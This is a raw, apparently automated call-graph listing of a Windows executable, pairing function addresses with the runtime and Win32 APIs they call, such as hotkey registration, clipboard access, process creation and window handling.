142340->142332 142342 1400415ea _flush 142341->142342 142343 140041681 142342->142343 142348 140041712 _flush 142342->142348 142368 14004188a 142342->142368 142403 1400c8eec _errno _invalid_parameter_noinfo 142343->142403 142345 140041690 142367 1400416ef _cftof_l _flush 142345->142367 142404 1400c8eec _errno _invalid_parameter_noinfo 142345->142404 142347 1400416a3 142347->142367 142405 1400c8eec _errno _invalid_parameter_noinfo 142347->142405 142348->142367 142409 1400c8eec _errno _invalid_parameter_noinfo 142348->142409 142350 1400416b6 142350->142367 142406 1400c8eec _errno _invalid_parameter_noinfo 142350->142406 142352 140041de9 142357 140041e12 FormatMessageW 142352->142357 142352->142368 142353 1400417a6 142353->142367 142410 1400c8eec _errno _invalid_parameter_noinfo 142353->142410 142355 1400416c9 142355->142367 142407 1400c8eec _errno _invalid_parameter_noinfo 142355->142407 142357->142368 142358 1400417b9 142358->142367 142411 1400c8eec _errno _invalid_parameter_noinfo 142358->142411 142360 1400416dc 142360->142367 142408 1400c8eec _errno _invalid_parameter_noinfo 142360->142408 142362 140041bfa 142366 140041d17 ShellExecuteExW 142362->142366 142364 1400417cc 142364->142367 142412 1400c8eec _errno _invalid_parameter_noinfo 142364->142412 142369 140041d31 142366->142369 142370 140041dde GetLastError 142366->142370 142367->142368 142372 140041a1e _cftof_l 142367->142372 142373 140041a8f CreateProcessW 142367->142373 142368->142289 142374 140041d3c GetModuleHandleW GetProcAddress 142369->142374 142382 140041ada 142369->142382 142370->142352 142372->142352 142372->142368 142379 140041b78 _flush 142372->142379 142372->142382 142415 1400c8eec _errno _invalid_parameter_noinfo 142372->142415 142376 140041b00 GetLastError 142373->142376 142377 140041acb 142373->142377 142374->142382 142375 1400417df 142375->142367 142413 1400c8eec _errno _invalid_parameter_noinfo 142375->142413 142376->142372 142380 140041ad4 CloseHandle 142377->142380 142377->142382 142379->142362 142383 140041c2a SetCurrentDirectoryW 142379->142383 142388 140041c33 142379->142388 142380->142382 142381 1400417f2 142381->142367 142414 1400c8eec _errno _invalid_parameter_noinfo 142381->142414 142382->142368 142385 140041dd0 CloseHandle 142382->142385 142383->142388 142385->142368 142386 140041cdc 142386->142366 142387 140041d0b SetCurrentDirectoryW 142386->142387 142387->142366 142388->142386 142389 140041cac GetFileAttributesW 142388->142389 142389->142386 142390 140041cb9 142389->142390 142390->142388 142391->142335 142392->142291 142393->142293 142394->142335 142395->142304 142396->142304 142397->142304 142398->142294 142399->142295 142400->142295 142401->142309 142402->142329 142403->142345 142404->142347 142405->142350 142406->142355 142407->142360 142408->142367 142409->142353 142410->142358 142411->142364 142412->142375 142413->142381 142414->142367 142415->142379 142416 140032a6e 142428 14003b920 142416->142428 142418 140032011 GetTickCount 142421 140032030 PeekMessageW 142418->142421 142426 140031fd7 142418->142426 142419 140031fea GlobalUnlock 142420 140031ffe CloseClipboard 142419->142420 142420->142418 142422 140032059 GetTickCount 142421->142422 142421->142426 142422->142426 142423 140032111 GetTickCount 142423->142426 142424 140088c90 134 API calls 142424->142426 142425 140031f30 134 API calls 142425->142426 142426->142418 142426->142419 142426->142420 142426->142422 142426->142423 142426->142424 142426->142425 142427 14003851b 142426->142427 142429 140088c90 134 API calls 142428->142429 142433 14003b95e 142429->142433 142430 14003b9df 142430->142426 142432 140031f30 134 API calls 142432->142433 142433->142430 142433->142432 142434 14003b9fb GetTickCount 142433->142434 142435 140088c90 134 API calls 142433->142435 142436 140077060 29 API calls 142433->142436 142434->142433 142435->142433 142436->142433 142437 1400cc264 GetStartupInfoW 142440 1400cc293 142437->142440 142470 1400cd9b4 HeapCreate 142440->142470 142441 1400cc2fa 142475 1400cd2a0 142441->142475 142442 1400cc2e6 142448 1400c9218 malloc 3 API calls 142442->142448 142443 1400cc2e1 _FF_MSGBANNER 142443->142442 142446 1400cc325 _RTC_Initialize 142447 1400cc330 142446->142447 142451 1400cc33e GetCommandLineW 142447->142451 142452 1400cc334 _amsg_exit 142447->142452 142448->142441 142449 1400cc30c _FF_MSGBANNER 142450 1400cc311 142449->142450 142453 1400c9218 malloc 3 API calls 142450->142453 142489 1400d2824 GetEnvironmentStringsW 142451->142489 142452->142451 142453->142446 142457 1400cc35c 142458 1400cc360 _amsg_exit 142457->142458 142459 1400cc36a 142457->142459 142458->142459 142499 1400d2464 142459->142499 142461 1400cc36f 142462 1400cc37d 142461->142462 142463 1400cc373 _amsg_exit 142461->142463 142505 1400c92fc 142462->142505 142463->142462 142465 1400cc387 142466 1400cc38b _amsg_exit 142465->142466 142467 1400cc392 _wwincmdln 142465->142467 142466->142467 142516 140005230 InitializeCriticalSection SetErrorMode 142467->142516 142469 1400cc3b8 142471 1400cd9dc GetVersion 142470->142471 142472 1400cc2d4 142470->142472 142473 1400cda00 142471->142473 142474 1400cd9e6 HeapSetInformation 142471->142474 142472->142441 142472->142442 142472->142443 142473->142472 142474->142473 142560 1400c9248 142475->142560 142477 1400cd2ab 142478 1400cd314 142477->142478 142479 1400cd2b4 FlsAlloc 142477->142479 142566 1400ccfe4 FlsFree DeleteCriticalSection DeleteCriticalSection 142478->142566 142479->142478 142480 1400cd2cc 142479->142480 142482 1400cf2b4 _getptd 4 API calls 142480->142482 142484 1400cd2db 142482->142484 142483 1400cc2ff 142483->142446 142483->142449 142483->142450 142484->142478 142485 1400cd2e3 FlsSetValue 142484->142485 142485->142478 142486 1400cd2f6 142485->142486 142565 1400cd00c _lock _lock _getptd 142486->142565 142488 1400cd300 GetCurrentThreadId 142488->142483 142490 1400d2848 142489->142490 142491 1400cc350 142489->142491 142568 1400cf234 142490->142568 142495 1400d2734 GetModuleFileNameW 142491->142495 142493 1400d286f 142494 1400d2888 FreeEnvironmentStringsW 142493->142494 142494->142491 142496 1400d2774 __wsetargv 142495->142496 142497 1400cf234 __wsetargv 11 API calls 142496->142497 142498 1400d27d4 __wsetargv 142496->142498 142497->142498 142498->142457 142500 1400d2497 142499->142500 142504 1400d248f 142499->142504 142501 1400cf2b4 _getptd 4 API calls 142500->142501 142503 1400d24c4 142501->142503 142502 1400cf2b4 _getptd 4 API calls 142502->142503 142503->142502 142503->142504 142504->142461 142506 1400c9312 _cinit 142505->142506 142573 1400cdfe8 142506->142573 142511 1400c9ba0 _cinit 8 API calls 142512 1400c9352 142511->142512 142513 1400c9375 _cinit 142512->142513 142515 1400c9ba0 8 API calls 142512->142515 142580 1400dd8f0 142512->142580 142513->142465 142515->142512 142517 140005265 142516->142517 142518 1400a8d40 20 API calls 142517->142518 142526 1400052c4 142518->142526 142519 1400057c1 142520 14002e080 30 API calls 142519->142520 142524 140005827 wcsncpy 142519->142524 142520->142524 142521 1400c8eec _errno _invalid_parameter_noinfo 142521->142526 142522 14002e080 30 API calls 142522->142526 142528 140005917 142524->142528 142530 1400058b7 142524->142530 142536 1400059d5 142524->142536 142656 1400c8eec _errno _invalid_parameter_noinfo 142524->142656 142525 14002e080 30 API calls 142532 140005948 142525->142532 142526->142519 142526->142521 142526->142522 142534 1400a8e00 20 API calls 142526->142534 142535 1400c8f74 malloc 10 API calls 142526->142535 142526->142536 142654 140005ff0 21 API calls 2 library calls 142526->142654 142655 1400c9144 20 API calls 142526->142655 142528->142525 142528->142532 142530->142528 142657 1400c8eec _errno _invalid_parameter_noinfo 142530->142657 142532->142536 142592 14001e810 142532->142592 142534->142526 142535->142526 142536->142469 142537 140005ad1 142539 140005ada FindWindowW 142537->142539 142541 140005b81 SystemParametersInfoW 142537->142541 142538 14000599a 142538->142536 142538->142537 142538->142539 142540 140005a5f 142538->142540 142539->142541 142550 140005a8c 142539->142550 142540->142541 142542 140005a6c FindWindowW 142540->142542 142543 140005bbb 142541->142543 142544 140005b9c 142541->142544 142542->142541 142542->142550 142612 14001eb30 142543->142612 142544->142543 142546 140005ba5 SystemParametersInfoW 142544->142546 142545 140005aff PostMessageW Sleep IsWindow 142548 140005b76 Sleep 142545->142548 142551 140005b2d 142545->142551 142546->142543 142548->142541 142549 140005b5c Sleep IsWindow 142549->142548 142549->142551 142550->142536 142550->142545 142551->142536 142551->142549 142552 140005bc7 142552->142536 142553 140005c04 _cftof_l 142552->142553 142554 1400c8f74 malloc 10 API calls 142552->142554 142638 14000c9e0 142553->142638 142554->142553 142556 140005c22 142557 140005c94 142556->142557 142558 14002e080 30 API calls 142556->142558 142651 140005d00 142557->142651 142558->142557 142567 1400ccfd8 EncodePointer 142560->142567 142562 1400c9253 142563 1400c9276 _initp_misc_winsig 142562->142563 142564 1400cdce4 EncodePointer 142563->142564 142564->142477 142565->142488 142566->142483 142569 1400cf25c 142568->142569 142570 1400c8f74 malloc 10 API calls 142569->142570 142571 1400cf294 142569->142571 142572 1400cf270 Sleep 142569->142572 142570->142569 142571->142493 142572->142569 142572->142571 142574 1400cdffe EncodePointer 142573->142574 142574->142574 142575 1400c932f 142574->142575 142576 1400c92c0 142575->142576 142577 1400c92ee 142576->142577 142578 1400c92d7 142576->142578 142577->142511 142577->142513 142578->142577 142583 1400c97a0 142578->142583 142589 14001e060 142580->142589 142582 1400dd8f9 142584 1400c97b5 142583->142584 142585 1400cf2b4 _getptd 4 API calls 142584->142585 142586 1400c97d4 142585->142586 142587 1400cf2b4 _getptd 4 API calls 142586->142587 142588 1400c97f1 142586->142588 142587->142588 142588->142578 142590 14001e2a6 _cftof_l 142589->142590 142591 14001e2ee OleInitializeWOW 142590->142591 142591->142582 142658 1400d1220 142592->142658 142596 14001e874 142597 1400a8e00 20 API calls 142596->142597 142599 14001e8a9 142596->142599 142597->142599 142598 14001e8f9 142598->142538 142599->142598 142601 1400a8e00 20 API calls 142599->142601 142602 14001e953 142599->142602 142600 1400a8d40 20 API calls 142603 14001e9c6 142600->142603 142601->142602 142602->142598 142602->142600 142603->142598 142604 1400a8e00 20 API calls 142603->142604 142609 14001ea23 142603->142609 142604->142609 142605 14001ea77 GetModuleFileNameW 142606 14001ea98 142605->142606 142607 14001eafd 142605->142607 142608 1400a8d40 20 API calls 142606->142608 142607->142598 142610 14001eac2 142608->142610 142609->142598 142609->142605 142610->142598 142611 1400a8d40 20 API calls 142610->142611 142611->142607 142613 14001ef8e 142612->142613 142614 14001eb4e _cftof_l 142612->142614 142613->142552 142614->142613 142672 1400adc60 142614->142672 142617 1400adc60 13 API calls 142618 14001ebe5 LoadCursorW RegisterClassExW 142617->142618 142619 14001ec40 RegisterClassExW 142618->142619 142625 14001ec67 142618->142625 142620 14001ec8b GetForegroundWindow 142619->142620 142619->142625 142621 14001eccd CreateWindowExW 142620->142621 142622 14001ec9e GetClassNameW 142620->142622 142621->142625 142626 14001ed48 GetMenu EnableMenuItem 142621->142626 142622->142621 142624 14001ecb9 142622->142624 142693 1400c8eec _errno _invalid_parameter_noinfo 142624->142693 142625->142552 142692 14001f090 EnableMenuItem EnableMenuItem EnableMenuItem EnableMenuItem 142626->142692 142629 14001ed75 CreateWindowExW 142629->142625 142630 14001ee13 9 API calls 142629->142630 142631 14001ef18 ShowWindow SetWindowLongW 142630->142631 142632 14001ef3e LoadAcceleratorsW 142630->142632 142631->142632 142633 14001ef69 142632->142633 142634 14001ef60 142632->142634 142635 14001f0f0 Shell_NotifyIconW 142633->142635 142634->142625 142636 14001ef7a 142634->142636 142635->142634 142637 14001efa0 PostMessageW SetClipboardViewer ChangeClipboardChain 142636->142637 142637->142625 142644 14000ca23 _cftof_l _flush 142638->142644 142640 14000ce94 142694 14000a540 142640->142694 142641 14000cad7 UnregisterHotKey 142641->142644 142643 14000ce34 UnregisterHotKey 142649 14000cb5e 142643->142649 142644->142641 142644->142649 142744 140006770 _errno _invalid_parameter_noinfo 142644->142744 142645 14000cee6 142646 14000cf1a 142645->142646 142647 14000cef8 SetTimer 142645->142647 142646->142556 142647->142646 142648 14000ce00 RegisterHotKey 142648->142649 142649->142640 142649->142643 142649->142648 142745 1400c8eec _errno _invalid_parameter_noinfo 142649->142745 142747 14001f300 142651->142747 142653 140005d0c 142653->142536 142654->142526 142655->142526 142656->142524 142657->142530 142659 14001e834 GetModuleFileNameW 142658->142659 142660 1400ace50 142659->142660 142661 1400ace60 _flush 142660->142661 142663 1400ace7c 142661->142663 142664 1400acc40 142661->142664 142663->142596 142671 1400acc63 142664->142671 142665 1400acdbb 142667 1400acdc1 FindFirstFileW 142665->142667 142670 1400accba 142665->142670 142666 1400acd40 FindFirstFileW 142668 1400acd5e FindClose 142666->142668 142666->142670 142669 1400acdd9 FindClose 142667->142669 142667->142670 142668->142670 142668->142671 142669->142670 142670->142663 142671->142665 142671->142666 142671->142670 142673 1400adc8d LoadLibraryExW 142672->142673 142674 1400adc9e 142672->142674 142673->142674 142675 1400ade51 142674->142675 142676 1400adcce EnumResourceNamesW 142674->142676 142677 1400adcc2 142674->142677 142678 1400ade82 ExtractIconW 142675->142678 142679 14001ebbc GetSystemMetrics 142675->142679 142676->142677 142680 1400add0f FindResourceW 142677->142680 142681 1400ade37 142677->142681 142678->142679 142679->142617 142680->142681 142682 1400add27 LoadResource 142680->142682 142681->142675 142684 1400ade5b FreeLibrary 142681->142684 142682->142681 142683 1400add3c LockResource 142682->142683 142683->142681 142685 1400add51 142683->142685 142684->142675 142686 1400add5c GetSystemMetrics 142685->142686 142687 1400add67 142685->142687 142686->142687 142687->142681 142688 1400addc9 FindResourceW 142687->142688 142688->142681 142689 1400adde3 LoadResource 142688->142689 142689->142681 142690 1400addf4 LockResource 142689->142690 142690->142681 142691 1400ade05 SizeofResource CreateIconFromResourceEx 142690->142691 142691->142681 142693->142621 142695 14000a6e1 142694->142695 142696 14000a57c 142694->142696 142716 1400c8f74 malloc 10 API calls 142695->142716 142730 14000a76b _cftof_l 142695->142730 142697 14000a5a8 142696->142697 142715 14000b772 142696->142715 142698 14000a5b0 PostThreadMessageW 142697->142698 142699 14000a5db GetTickCount 142698->142699 142700 14000a5cb Sleep 142698->142700 142701 14000a5f0 GetExitCodeThread 142699->142701 142700->142698 142700->142699 142702 14000a612 GetTickCount 142701->142702 142703 14000a62b CloseHandle 142701->142703 142704 14000a621 Sleep 142702->142704 142705 14000a644 142702->142705 142703->142705 142704->142701 142706 14000a66c 142705->142706 142707 14000a64d 142705->142707 142709 14000a685 142706->142709 142710 14000a671 CloseHandle 142706->142710 142708 14000a652 CreateMutexW 142707->142708 142707->142709 142708->142709 142711 14000a6ae 142709->142711 142712 14000a68e 142709->142712 142710->142709 142714 14000a6b4 CloseHandle 142711->142714 142733 14000a6c8 142711->142733 142713 14000a694 CreateMutexW 142712->142713 142712->142733 142713->142733 142714->142733 142715->142645 142716->142730 142718 14000b4a5 142719 14000b4f3 142718->142719 142720 14000b4ad CreateThread 142718->142720 142722 14000b500 PostThreadMessageW 142719->142722 142721 14000b4e5 SetThreadPriority 142720->142721 142720->142733 142721->142719 142723 14000b52b GetTickCount 142722->142723 142724 14000b51b Sleep 142722->142724 142732 14000b535 142723->142732 142724->142722 142724->142723 142725 14000b60e GetExitCodeThread 142727 14000b650 CloseHandle 142725->142727 142728 14000b630 GetTickCount 142725->142728 142726 14000b53e PeekMessageW 142726->142728 142726->142732 142739 14000b670 142727->142739 142731 14000b643 Sleep 142728->142731 142728->142739 142729 14000ace6 142729->142715 142729->142718 142730->142729 142746 140006770 _errno _invalid_parameter_noinfo 142730->142746 142731->142732 142732->142725 142732->142726 142732->142739 142733->142645 142733->142715 142734 14000b705 142737 14000b71e 142734->142737 142738 14000b70a CloseHandle 142734->142738 142735 14000b6e6 142736 14000b6eb CreateMutexW 142735->142736 142735->142737 142736->142737 142740 14000b748 142737->142740 142741 14000b728 142737->142741 142738->142737 142739->142734 142739->142735 142740->142733 142743 14000b74e CloseHandle 142740->142743 142741->142733 142742 14000b72e CreateMutexW 142741->142742 142742->142733 142743->142733 142744->142644 142745->142649 142746->142730 142748 1400c8f74 malloc 10 API calls 142747->142748 142749 14001f31e 142748->142749 142750 14001f32d 142749->142750 142751 14001f357 SetTimer 142749->142751 142750->142653 142752 14001f397 GetTickCount 142751->142752 142758 14001f389 142751->142758 142753 14001f3f2 GetTickCount 142752->142753 142754 14001f3cb SetTimer 142752->142754 142755 140031f30 134 API calls 142753->142755 142754->142753 142756 14001f42c 142755->142756 142757 14001f43e KillTimer 142756->142757 142756->142758 142757->142758 142759 14001f5bc 142758->142759 142761 14001f5cc 142758->142761 142765 14001f56b 142758->142765 142767 140005ff0 21 API calls 2 library calls 142759->142767 142762 14001f676 142761->142762 142763 14001f659 142761->142763 142761->142765 142764 1400a8e00 20 API calls 142762->142764 142763->142765 142766 1400c8f74 malloc 10 API calls 142763->142766 142764->142765 142765->142653 142766->142765 142767->142765 142768 140050076 142769 1400500a2 142768->142769 142770 14005007b 142768->142770 142772 1400500ae IsZoomed 142769->142772 142774 1400500c0 142769->142774 142771 1400b12d0 95 API calls 142770->142771 142771->142769 142773 1400500c4 IsIconic 142772->142773 142772->142774 142773->142774 142775 1400336b3 142787 140059d20 142775->142787 142777 140032011 GetTickCount 142778 140031fd7 142777->142778 142781 140032030 PeekMessageW 142777->142781 142778->142777 142779 140031fea GlobalUnlock 142778->142779 142780 140031ffe CloseClipboard 142778->142780 142782 140032059 GetTickCount 142778->142782 142783 140032111 GetTickCount 142778->142783 142784 140088c90 134 API calls 142778->142784 142785 140031f30 134 API calls 142778->142785 142786 14003851b 142778->142786 142779->142780 142780->142777 142781->142778 142781->142782 142782->142778 142783->142778 142784->142778 142785->142778 142798 140059d3b 142787->142798 142788 140059f8a 142789 14005a88a 142788->142789 142791 140059f9d 142788->142791 142800 14005a065 142788->142800 142790 14005a8da 142789->142790 142796 140059d43 142789->142796 142797 14005a8ec 142789->142797 142847 140005ff0 21 API calls 2 library calls 142790->142847 142801 14005a003 GetEnvironmentVariableW 142791->142801 142810 140059f36 142791->142810 142792 14005a19f 142792->142796 142803 14005a50e 142792->142803 142804 14005a1b6 142792->142804 142794 14005a1c5 142794->142796 142843 140006170 18 API calls _flush 142794->142843 142795 140059e9b 142795->142788 142799 140059f25 142795->142799 142796->142778 142797->142796 142807 14005a972 142797->142807 142812 14005a995 142797->142812 142798->142795 142798->142796 142802 140059e8b 142798->142802 142805 140088c90 134 API calls 142799->142805 142800->142810 142816 14005a0f1 GetEnvironmentVariableW 142800->142816 142837 140068e00 142800->142837 142801->142810 142841 1400aecb0 OutputDebugStringW 142802->142841 142813 14005a596 142803->142813 142814 14005a562 142803->142814 142819 14005a523 142803->142819 142804->142794 142809 14005a22b 142804->142809 142824 14005a23b 142804->142824 142805->142810 142806 14005a156 142806->142792 142806->142803 142811 140088c90 134 API calls 142806->142811 142807->142796 142827 1400c8f74 malloc 10 API calls 142807->142827 142842 140005ff0 21 API calls 2 library calls 142809->142842 142810->142789 142810->142796 142810->142806 142811->142792 142822 1400a8e00 20 API calls 142812->142822 142813->142819 142826 14005a633 142813->142826 142832 14005a610 142813->142832 142817 14005a567 142814->142817 142818 14005a57b 142814->142818 142816->142800 142844 140005ff0 21 API calls 2 library calls 142817->142844 142845 1400060b0 GlobalAlloc GlobalLock GlobalFree 142818->142845 142819->142796 142846 140006170 18 API calls _flush 142819->142846 142822->142796 142823 14005a58a 142823->142819 142824->142794 142825 14005a2d9 142824->142825 142830 14005a2b6 142824->142830 142828 1400a8e00 20 API calls 142825->142828 142831 1400a8e00 20 API calls 142826->142831 142827->142796 142828->142794 142830->142794 142833 1400c8f74 malloc 10 API calls 142830->142833 142831->142819 142832->142819 142834 1400c8f74 malloc 10 API calls 142832->142834 142833->142794 142834->142819 142839 140068e2e 142837->142839 142838 140068ec9 SHGetFolderPathW 142840 140068ee7 142838->142840 142839->142838 142840->142800 142841->142796 142842->142794 142843->142796 142844->142819 142845->142823 142846->142796 142847->142796 142848 14002053b GetCPInfo 142851 1400203c0 FindResourceW 142848->142851 142850 14002057d 142852 140020429 SizeofResource 142851->142852 142853 140020409 FindResourceW 142851->142853 142854 14002043c LoadResource 142852->142854 142857 140020495 142852->142857 142853->142852 142853->142857 142855 14002044c LockResource 142854->142855 142854->142857 142856 14002045f 142855->142856 142855->142857 142856->142857 142859 1400a9570 142856->142859 142857->142850 142860 1400a959b GetCPInfo 142859->142860 142862 1400a95b0 142859->142862 142860->142862 142861 1400a9665 142861->142857 142862->142861 142864 1400a95e7 142862->142864 142866 1400a92c0 142862->142866 142864->142861 142865 1400a9657 GetCPInfo 142864->142865 142865->142861 142867 1400a92d9 142866->142867 142869 1400a92e0 142866->142869 142868 1400c8f74 malloc 10 API calls 142867->142868 142868->142869 142869->142864 142870 14003617c 142882 140049780 142870->142882 142872 14003851b 142873 140032011 GetTickCount 142876 140032030 PeekMessageW 142873->142876 142879 140031fd7 142873->142879 142874 140031fea GlobalUnlock 142875 140031ffe CloseClipboard 142874->142875 142875->142873 142877 140032059 GetTickCount 142876->142877 142876->142879 142877->142879 142878 140032111 GetTickCount 142878->142879 142879->142872 142879->142873 142879->142874 142879->142875 142879->142877 142879->142878 142880 140088c90 134 API calls 142879->142880 142881 140031f30 134 API calls 142879->142881 142880->142879 142881->142879 142905 1400673e0 142882->142905 142884 1400497ab 142885 1400497b7 GetWindowRect 142884->142885 142886 1400498c3 142884->142886 142885->142886 142887 1400497cd 142885->142887 142886->142879 142888 1400497fd 142887->142888 142916 1400c8eec _errno _invalid_parameter_noinfo 142887->142916 142891 14004982f 142888->142891 142918 1400c8eec _errno _invalid_parameter_noinfo 142888->142918 142890 1400497f1 142890->142888 142917 1400144b0 16 API calls 142890->142917 142893 14004985c 142891->142893 142920 1400c8eec _errno _invalid_parameter_noinfo 142891->142920 142898 140049886 MoveWindow 142893->142898 142922 1400c8eec _errno _invalid_parameter_noinfo 142893->142922 142895 140049823 142895->142891 142919 1400144b0 16 API calls 142895->142919 142897 140049850 142897->142893 142921 1400144b0 16 API calls 142897->142921 142898->142886 142903 14004987a 142903->142898 142923 1400144b0 16 API calls 142903->142923 142906 1400673ed 142905->142906 142907 140067463 142906->142907 142909 14006740e GetForegroundWindow 142906->142909 142908 1400b12d0 95 API calls 142907->142908 142910 1400674be 142908->142910 142911 140067421 142909->142911 142913 140067446 142909->142913 142910->142884 142912 140067431 IsWindowVisible 142911->142912 142911->142913 142912->142913 142914 14006743e 142912->142914 142913->142884 142924 1400b29a0 LoadLibraryW GetProcAddress 142914->142924 142916->142890 142918->142895 142920->142897 142922->142903 142924->142913 142925 1400370bc 142937 140065d90 142925->142937 142927 140032011 GetTickCount 142930 140032030 PeekMessageW 142927->142930 142933 140031fd7 142927->142933 142928 140031fea GlobalUnlock 142929 140031ffe CloseClipboard 142928->142929 142929->142927 142931 140032059 GetTickCount 142930->142931 142930->142933 142931->142933 142932 140032111 GetTickCount 142932->142933 142933->142927 142933->142928 142933->142929 142933->142931 142933->142932 142934 140088c90 134 API calls 142933->142934 142935 140031f30 134 API calls 142933->142935 142936 14003851b 142933->142936 142934->142933 142935->142933 142940 140065da8 142937->142940 142938 140065df8 SetLastError DeleteFileW GetLastError 142939 140065e33 142938->142939 142943 140066590 142939->142943 142940->142938 142940->142939 142944 1400665ab _flush 142943->142944 142945 1400665c1 142944->142945 142948 1400665db 142944->142948 142946 14003ebc0 137 API calls 142945->142946 142947 140065e57 142946->142947 142947->142933 142949 14006675c 142948->142949 142952 14006665f 142948->142952 142950 14003ebc0 137 API calls 142949->142950 142950->142947 142955 1400667a0 12 API calls 142952->142955 142954 14006674b 142954->142947 142955->142954 142956 1400372bc 142957 1400372c9 142956->142957 142958 1400372e8 142956->142958 142971 140080940 142957->142971 142959 14003ebc0 137 API calls 142958->142959 142962 140031fd7 142959->142962 142961 140032011 GetTickCount 142961->142962 142965 140032030 PeekMessageW 142961->142965 142962->142961 142963 140031fea GlobalUnlock 142962->142963 142964 140031ffe CloseClipboard 142962->142964 142966 140032059 GetTickCount 142962->142966 142967 140032111 GetTickCount 142962->142967 142968 140088c90 134 API calls 142962->142968 142969 140031f30 134 API calls 142962->142969 142970 14003851b 142962->142970 142963->142964 142964->142961 142965->142962 142965->142966 142966->142962 142967->142962 142968->142962 142969->142962 142972 14008094b RemoveDirectoryW 142971->142972 142973 14008095e GetFullPathNameW 142971->142973 142972->142958 142974 1400809ab GetFileAttributesW 142973->142974 142975 14008099e 142973->142975 142976 140080a1b 142974->142976 142977 1400809bb 142974->142977 142975->142974 142976->142958 142977->142976 142978 1400809bf SHFileOperationW 142977->142978 142978->142976 142979 14003667a 142991 14004e7c0 142979->142991 142981 14003851b 142982 140032011 GetTickCount 142985 140032030 PeekMessageW 142982->142985 142987 140031fd7 142982->142987 142983 140031fea GlobalUnlock 142984 140031ffe CloseClipboard 142983->142984 142984->142982 142986 140032059 GetTickCount 142985->142986 142985->142987 142986->142987 142987->142981 142987->142982 142987->142983 142987->142984 142987->142986 142988 140032111 GetTickCount 142987->142988 142989 140088c90 134 API calls 142987->142989 142990 140031f30 134 API calls 142987->142990 142988->142987 142989->142987 142990->142987 142998 140042e20 142991->142998 142993 14004e7e6 142994 1400673e0 97 API calls 142993->142994 142995 14004e85d 142994->142995 142996 14004ec24 142995->142996 142997 14003ebc0 137 API calls 142995->142997 142996->142987 142997->142996 142999 140042e32 142998->142999 143000 140042fbe 142998->143000 142999->143000 143037 1400c8eec _errno _invalid_parameter_noinfo 142999->143037 143000->142993 143002 140042e48 143003 140042fb3 143002->143003 143038 1400c8eec _errno _invalid_parameter_noinfo 143002->143038 143003->142993 143005 140042e5f 143005->143003 143039 1400c8eec _errno _invalid_parameter_noinfo 143005->143039 143007 140042e76 143008 140042e7a 143007->143008 143040 1400c8eec _errno _invalid_parameter_noinfo 143007->143040 143008->142993 143010 140042e94 143011 140042fa8 143010->143011 143041 1400c8eec _errno _invalid_parameter_noinfo 143010->143041 143011->142993 143013 140042eab 143013->143011 143042 1400c8eec _errno _invalid_parameter_noinfo 143013->143042 143015 140042ec2 143016 140042ec6 143015->143016 143043 1400c8eec _errno _invalid_parameter_noinfo 143015->143043 143016->142993 143018 140042ee0 143019 140042ee4 143018->143019 143044 1400c8eec _errno _invalid_parameter_noinfo 143018->143044 143019->142993 143021 140042efe 143022 140042f02 143021->143022 143045 1400c8eec _errno _invalid_parameter_noinfo 143021->143045 143022->142993 143024 140042f1c 143025 140042f20 143024->143025 143046 1400c8eec _errno _invalid_parameter_noinfo 143024->143046 143025->142993 143027 140042f3a 143028 140042f3e 143027->143028 143047 1400c8eec _errno _invalid_parameter_noinfo 143027->143047 143028->142993 143030 140042f58 143031 140042f5c 143030->143031 143048 1400c8eec _errno _invalid_parameter_noinfo 143030->143048 143031->142993 143033 140042f76 143034 140042f7a 143033->143034 143049 1400c8eec _errno _invalid_parameter_noinfo 143033->143049 143034->142993 143036 140042f94 143036->142993 143037->143002 143038->143005 143039->143007 143040->143010 143041->143013 143042->143015 143043->143018 143044->143021 143045->143024 143046->143027 143047->143030 143048->143033 143049->143036 143050 140048380 143051 1400483a0 143050->143051 143052 1400673e0 97 API calls 143051->143052 143053 1400483d2 143052->143053 143054 140048469 143053->143054 143055 140048439 143053->143055 143056 1400483fa 143053->143056 143068 1400b28f0 GetModuleHandleW GetProcAddress SendMessageTimeoutW 143055->143068 143058 140048426 143056->143058 143059 1400483fe 143056->143059 143067 1400b28f0 GetModuleHandleW GetProcAddress SendMessageTimeoutW 143058->143067 143061 140048402 143059->143061 143062 140048413 143059->143062 143061->143054 143064 140048450 ShowWindow 143061->143064 143066 1400b28f0 GetModuleHandleW GetProcAddress SendMessageTimeoutW 143062->143066 143063 14004841b 143063->143054 143063->143064 143064->143054 143066->143063 143067->143063 143068->143063 143069 14003597d 143070 140035993 143069->143070 143078 140031fd7 143069->143078 143082 140014ba0 143070->143082 143072 14003851b 143073 140032011 GetTickCount 143076 140032030 PeekMessageW 143073->143076 143073->143078 143074 140031fea GlobalUnlock 143075 140031ffe CloseClipboard 143074->143075 143075->143073 143077 140032059 GetTickCount 143076->143077 143076->143078 143077->143078 143078->143072 143078->143073 143078->143074 143078->143075 143078->143077 143079 140032111 GetTickCount 143078->143079 143080 140088c90 134 API calls 143078->143080 143081 140031f30 134 API calls 143078->143081 143079->143078 143080->143078 143081->143078 143083 140014bea 143082->143083 143084 140014bfa 143082->143084 143335 1400c9144 20 API calls 143083->143335 143086 140014c2c 143084->143086 143336 1400c9144 20 API calls 143084->143336 143088 140014c74 CreateMutexW GetLastError 143086->143088 143089 140014c6e CloseHandle 143086->143089 143114 140014cc3 143086->143114 143090 140014ca3 143088->143090 143104 140014c9a 143088->143104 143089->143088 143093 140014ca8 CloseHandle 143090->143093 143090->143104 143091 140014d92 143096 140014e8f GetForegroundWindow 143091->143096 143097 140014d9f GetTickCount 143091->143097 143092 140014d3f GetWindowThreadProcessId 143094 140014ee3 GetKeyboardLayout 143092->143094 143095 140014d57 143092->143095 143093->143104 143101 140014f02 143094->143101 143095->143094 143100 140014d63 143095->143100 143098 140014eda 143096->143098 143099 140014e9a GetWindowThreadProcessId GetGUIThreadInfo 143096->143099 143097->143096 143102 140014db4 143097->143102 143098->143094 143099->143098 143103 140014ec4 143099->143103 143337 1400b28f0 GetModuleHandleW GetProcAddress SendMessageTimeoutW 143100->143337 143117 140014f73 143101->143117 143192 14001a010 ActivateKeyboardLayout 143101->143192 143102->143096 143113 140014de0 GetCurrentThreadId 143102->143113 143103->143098 143106 140014ed0 GetWindowThreadProcessId 143103->143106 143104->143114 143186 14000b960 143104->143186 143106->143098 143108 140014d6b 143108->143094 143111 140014d73 AttachThreadInput 143108->143111 143111->143094 143112 140014f46 GetProcAddress 143115 140014f6a FreeLibrary 143112->143115 143116 140014f5b 143112->143116 143113->143096 143121 140014df2 143113->143121 143114->143091 143114->143092 143115->143117 143116->143115 143118 140014fc4 GetTickCount 143117->143118 143119 140014f9b 143117->143119 143124 140014fd8 143118->143124 143119->143124 143127 140015069 _flush 143119->143127 143120 140014e10 GetAsyncKeyState 